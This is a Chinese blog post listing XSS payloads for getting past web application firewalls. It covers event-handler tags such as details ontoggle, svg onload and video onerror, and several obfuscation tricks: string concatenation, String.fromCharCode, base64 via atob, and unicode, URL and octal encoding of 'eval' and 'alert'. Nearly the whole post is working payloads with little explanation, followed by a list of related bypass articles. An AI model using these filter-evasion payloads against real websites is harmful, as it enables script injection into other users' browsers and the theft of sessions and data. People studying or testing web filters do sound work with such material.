美文网首页
12.waf绕过之xss

12.waf绕过之xss

作者: 皮蛋是个臭蛋 | 来源:发表于2020-08-19 17:42 被阅读0次

可用语句有:

<video src=1 onerror=alert(/xss/)>绕过
<audio src=x onerror=alert(/xss/)>
 <body/onfocus=alert(/xss/)>
 <details open ontoggle=alert(/xss/)>
 <button onfocus=alert(/xss/)autofocus>
<details open ontoggle=top.alert(1)>    //注,在goole浏览器实用
<details open ontoggle=top[‘prompt’](1)>
<details open ontoggle=top[‘al’%2b’ert’](1)> %2b为url编码的+
%27"><details%20open%20ontoggle=eval(%27alert(1)%27)>

使用concat来拼接字符串javascript:alert(1)//不行
<iframe onload=location=’javascri’.concat(‘pt:aler’,’t(1)’)>

<script>alert(1)</script>Ascii编码
<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62)) >

<svg/onload=setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))>
其他:
Base64编码:
<details open ontoggle=eval(atob(‘YWxlcnQoMSk=’)) >
eval拦截的话,可以试试,把 e Unicode编码
<details open ontoggle=\u0065val(atob(‘YWxlcnQoMSk=’)) >
url编码:
<details open ontoggle=%65%76%61%6c(atob(‘YWxlcnQoMSk=’)) >
url编码:
<details open ontoggle=eval(‘%61%6c%65%72%74%28%31%29’) >
JS8编码:
<details open ontoggle=eval(‘\141\154\145\162\164\50\61\51’) >
Ascii码绕过:
<details open ontoggle=eval(String.fromCharCode(97,108,101,114,116,40,49,41)) >

相关文章

  • 12.waf绕过之xss

    可用语句有:

  • xss绕过

    当常见标签被过滤时,可以尝试以下几种,亲测有效 更多参考www.freebuf.com/articles/web/...

  • XSS 绕过

    javascript 1、JavaScript代码可以直接嵌在网页的任何地方,不过通常我们都把JavaScript...

  • XSS绕过WAF

    http://www.freebuf.com/articles/web/54686.html

  • XSS绕过姿势

    0x01 简单介绍 一个文件上传点是执行XSS应用程序的绝佳机会。很多网站都有用户权限上传个人资料图片的上传点,你...

  • XSS 绕过方法

    1、大小写混用 2、拼凑后台可能对一些字符过滤了一次,但是过滤后的其余字符又重新拼凑 3、注释干扰 4、使用img...

  • xss编码绕过

    对于xss等有关的html,url,unicode编码做的一个小总结。 - 奶奶奶奶奶糖 - 博客园

  • XSS攻击(Cross Site Scripting)

    参考资料:[1]. 浅谈XSS攻击的那些事(附常用绕过姿势)[2]. XSS(偷你的Cookies) 什么是XSS...

  • 绕过XSS-Filter

    绕过XSS-Filter (1)利用<>标记 XSS-Filter通常过滤转义“<>”“ ”等字符 (2)利用HT...

  • XSS绕过学习【转载】

    1,绕过单引号 我们假设管理员在我们的单引号之前放置了一个“\”,有时候双引号之前也会放置,通 过一些类似add_...

网友评论

      本文标题:12.waf绕过之xss

      本文链接:https://www.haomeiwen.com/subject/wkcdjktx.html